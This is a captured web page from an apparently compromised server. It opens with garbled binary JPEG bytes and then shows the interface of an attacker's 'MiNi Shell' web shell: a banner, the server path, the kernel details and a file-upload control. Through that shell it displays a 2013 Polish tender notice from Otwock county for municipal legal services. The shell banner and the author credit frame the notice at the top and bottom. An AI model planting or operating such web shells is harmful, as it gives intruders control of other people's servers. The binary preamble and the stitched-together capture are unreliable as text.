JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130710/268556-N-2013.html

<p class="kh_header"><b>Otwock: Obsługa prawna Starostwa Powiatowego w Otwocku oraz powiatowych jednostek organizacyjnych:
 Powiatowe Centrum Pomocy Rodzinie w Otwocku, 
 Oświata Powiatowa w Otwocku,  
Zarząd Dróg Powiatowych w Otwocku,
Publicznej Biblioteki Powiatowej w Otwocku - w przypadku jej utworzenia.</b><br>
<b>Numer ogłoszenia: 268556 - 2013; data zamieszczenia: 10.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Otwocki , ul. Górna 13, 05-400 Otwock, woj. mazowieckie, tel. 22 778-1-300, faks 22 778-1-302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-otwocki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa prawna Starostwa Powiatowego w Otwocku oraz powiatowych jednostek organizacyjnych:
 Powiatowe Centrum Pomocy Rodzinie w Otwocku, 
 Oświata Powiatowa w Otwocku,  
Zarząd Dróg Powiatowych w Otwocku,
Publicznej Biblioteki Powiatowej w Otwocku - w przypadku jej utworzenia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Obsługa prawna Starostwa Powiatowego w Otwocku oraz powiatowych jednostek organizacyjnych:
- Powiatowe Centrum Pomocy Rodzinie w Otwocku, 
- Oświata Powiatowa w Otwocku,  
- Zarząd Dróg Powiatowych w Otwocku,
- Publicznej Biblioteki Powiatowej w Otwocku - w przypadku jej utworzenia,
polegająca na  świadczeniu   obsługi prawnej, a w szczególności  na:
1)  udzielaniu porad prawnych  i konsultacji prawnych w zakresie stosowania prawa w  odniesieniu do   wykonywanych przez powiat zadań, z wyłączeniem działań przed procesowych;
2)  współudziale przy opracowywaniu statutów, regulaminów, zarządzeń i innych dokumentów  regulujących funkcjonowanie organów powiatu, Starostwa Powiatowego      oraz jednostek organizacyjnych powiatu;
3) udziale w opracowywaniu  projektów przepisów prawa miejscowego;
4) udziale w opracowywaniu i uzgadnianiu  oraz opiniowanie pod względem prawnym  
i legislacyjnym aktów prawa  wydawanych przez   Zarząd  Powiatu oraz projektów uchwał Rady Powiatu  i innych aktów prawnych związanych z  zakresem działalności Zamawiającego;
5)  udziale w sesjach Rady Powiatu i posiedzeniach Zarządu Powiatu;
6) opiniowaniu projektów umów, porozumień, uzgodnień,  pism i innych dokumentów oraz  uczestnictwie  w negocjacjach nad ich  tworzeniem;
7) opiniowaniu korespondencji Zamawiającego  z organami  administracji publicznej   i innymi instytucjami  oraz osobami prawnymi i fizycznymi, z wyłączeniem działań przed procesowych;
8)  opiniowaniu projektów udzielanych pełnomocnictw i upoważnień;
9) opiniowaniu dokumentacji przygotowanej w oparciu o przepisy ustawy - Prawo zamówień    publicznych, z wyłączeniem działań przed procesowych;
10) udziale w negocjowaniu warunków umów i porozumień zawieranych przez Powiat  Otwocki  i Starostę reprezentującego Skarb Państwa;
11) reprezentowaniu zleceniodawcy w mediach, w sytuacjach, w których zleceniodawca   uzna  za wskazane;
12) sporządzaniu opinii prawnych, ekspertyz, analiz i komunikatów prawnych, z wyłączeniem działań przed procesowych;
13) prowadzeniu konsultacji prawnych, w tym  konsultacje i doradztwo  w zakresie  spraw wynikających z Kodeksu pracy i umów cywilno-prawnych dotyczących zatrudnienia pracowników, z wyłączeniem działań przed procesowych;
14)  wskazywaniu  propozycji rozwiązywania problemów prawnych, z wyłączeniem działań przed procesowych;
15) współudziale  w organizowaniu szkoleń wewnętrznych,  szczególnie z zakresu nowych rozwiązań prawnych;
16) innych czynności według potrzeb Zamawiającego związanych z obsługa prawną.
17) usługa nie obejmuje zastępstwa procesowego, w tym działań przed procesowych obejmujących doradztwo, opinie, analizy i pisma - przed urzędami i organami orzekającymi, a przede wszystkim sądami powszechnymi, ogólnymi i szczególnymi organami administracji państwowej, samorządowej oraz sadami polubownymi, przed Krajową Izbą Odwoławczą,  w sprawach związanych z działalnością powiatu. Prowadzenie spraw w tym zakresie ( wykonywanie zastępstwa procesowego przed sądami) powierzone będzie w wyniku przeprowadzenia  odrębnego postępowania

2. Zasady świadczenia usług:
1) obsługa  prawna będzie wykonywana w siedzibie Zamawiającego  lub w innych  miejscach w  zależności od potrzeb Zamawiającego ( np. obsługa sesji Rady Powiatu w miejscu, w którym   będzie odbywała się sesja);
2)  Wykonawca  będzie wykonywał obsługę prawna osobiście  w każdy dzień tygodnia  od  poniedziałku do piątku  po 7 godzin dziennie 9 00 -1600 + obsługa  prawna Sesji Powiatu  4 godziny nie częściej niż  jeden  raz  w miesiącu    po  godz. 1600;
3)  Wykonawca  zapewni do dyspozycji  Zamawiającego   przez 5 dni w tygodni po  7  godzin dziennie (w każdym  miesiącu trwania umowy) co najmniej jednego prawnika  - adwokata lub radcę prawnego uzgodnionego z Zamawiającym, który posiada co najmniej 2 letnie doświadczenie  w świadczeniu obsługi prawnej jednostek  samorządu terytorialnego,
4) do wykonywania usługi opisanej w pkt. 1 Wykonawca wyznaczy koordynatora- radcę prawnego lub  adwokata; 
5) sprawy, które Zamawiający uzna za pilne, a  w szczególności, które muszą być  natychmiast wniesione na Zarząd Powiatu lub Radę Powiatu Wykonawca  wykona w ciągu  12 godzin;
6) świadczenie usług na rzecz Zamawiającego muszą   wykonywać osoby uprawnione do   świadczenia pomocy prawnej  na podstawie przepisów dotyczących radców prawnych i    adwokatów   oraz  zgodnie  z zasadami etyki wydanymi przez odpowiedni organ   samorządu;

 3. Od Wykonawcy wymaga się nie ujawniania osobom trzecim jakichkolwiek informacji poufnych lub mających  albo mogących mieć charakter tajemnicy uzyskanych w związku  bądź przy okazji wykonywania umowy, w okresie  jej obowiązywania jak i w ciągu trzech lat po jej wygaśnięciu lub rozwiązani  bądź  odstąpieniu od umowy, przyjmując na siebie pełną odpowiedzialność za szkody wyrządzone Zamawiającemu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8, 79.11.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia tego warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia tego warunku;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli  wykonawca wykaże, że dysponuje minimum 3  osobami, które  będą uczestniczyć w wykonywaniu  zamówienia, legitymującym się kwalifikacjami zawodowymi w postaci uprawnień  radcy prawnego lub adwokata , zgodnie z przepisami ustawy  z dnia 6 lipca 1982 r. o radcach prawnych ( Dz.U.  z 2010 r. Nr 10, poz.65 z póź.zm ) oraz ustawy z dnia 26 maja 1982 r.-  Prawo o adwokaturze ( Dz.U. z 2009 r., Nr 146 poz. 1188 z późn. zm,  lub aplikanta radcowskiego lub aplikanta  adwokackiego, w tym co najmniej 2 osoby spośród wykazanych osób posiadają co najmniej  2 letnie doświadczenie  jako radca prawny lub adwokat  w świadczeniu obsługi prawnej jednostek samorządu terytorialnego, wpisanych  na listę radców prawnych prowadzona przez Okręgową Izbę Radców Prawnych lub listę adwokatów  prowadzoną przez  Okręgową Radę Adwokacką</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający dokona oceny w kryterium  doświadczenie na podstawie złożonych dokumentów.
W tym celu należy złożyć wykaz wykonanych usług  dot: obsługi prawnej j.st. na podstawie załącznika do SIWZ.  Wykaz wykonanych usług . Do wykazu Zamawiający wymaga, aby załączone  były dokumenty potwierdzające, że usługi te zostały wykonane
 ( np.  umowę zawartą  na czas oznaczony lub nieoznaczony  z jednostką samorządu terytorialnego, protokół odbioru, referencje).  Jeżeli Wykonawca wykaże kilka  usług dot: obsługi prawnej np. powiatu, czy kilka usług dotyczących gminy , to Zamawiający dokona sumowania okresu świadczenia tych usług dla powiatu oddzielnie i dla pozostałych j.s.t oddzielnie np gminy i województwa, przy czym, gdy usługi będą świadczone  w tym samym czasie w powiecie, wówczas Zamawiający nie będzie sumował okresów wykonywania usługi, a jedynie do oceny przyjmuje  krańcowe okresy ( np .
 1 usługa świadczona od 1.01.2010 r do 31.12.2011 r., druga od 01.01.2011 r. do 31.12.2012 r.  dla powiatu - do oceny  przyjęty zostanie  okres  01.01.2010 r. do 31.12.2012 r. czyli 3 lata). - kryterium 2 . 
Jeżeli w tym okresie będzie wykonywał usługę prawną  dla pozostałych j.s.t.   to zamawiający będzie  oddzielnie sumował ten okres  dla pozostałych j.s.t. np.  w okresie od 01.07.2010 r do 01.07.2011 r  wykonawca realizował usługę do gminy i od  01.01.2011 r. do 31.12.2011 r. dla urzędu marszałkowskiego  to zamawiający przyjmie do oceny   w kryterium 3 od 1.07.2010 do 31.12.2011r tj 18 miesięcy.
Jeżeli Wykonawca na potwierdzenie wykonania usługi prawnej  wykaże usługę wykonywaną ( w trakcie realizacji)  Zamawiający do oceny przyjmuje okres  do  umowy  1.07.2013r. , 
Ocenie poddane zostanie doświadczenie wykonywane nie wcześniej niż w okresie. od 10.07.2008 r.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - doświadczenie wykonawcy  w stałej obsłudze prawnej powiatu - 7</li>
<li>3 - doświadczenie wykonawcy w stałej obsłudze prawnej  pozostałych j.st.(gminy, województwa) - 3</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wykonawca może dokonać zmiany prawnika świadczącego usługę przedstawionego 
         w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego 
          nowego prawnika;
2.Wykonawca z własnej inicjatywy proponuje zmianę prawnika  w następujących 
      przypadkach:
a)	śmierci, choroby lub innych zdarzeń losowych prawnika ;
b)	nie wywiązywania się prawnika  z obowiązków wynikających z Umowy; 
c)	jeżeli zmiana prawnika  stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji, itp.).
3.Zamawiający może zażądać od Wykonawcy zmiany prawnika, jeżeli uzna, że         dotychczasowy prawnik  nie wykonuje swoich obowiązków wynikających z  
           Umowy.
4.	W przypadku zmiany prawnika, nowy prawnik musi spełniać wymagania określone dla dotychczasowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-otwocki.pl/BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Otwocku ul. Komunardów 10 wejście D pok. 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Otwocku ul. Górna 13 - kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com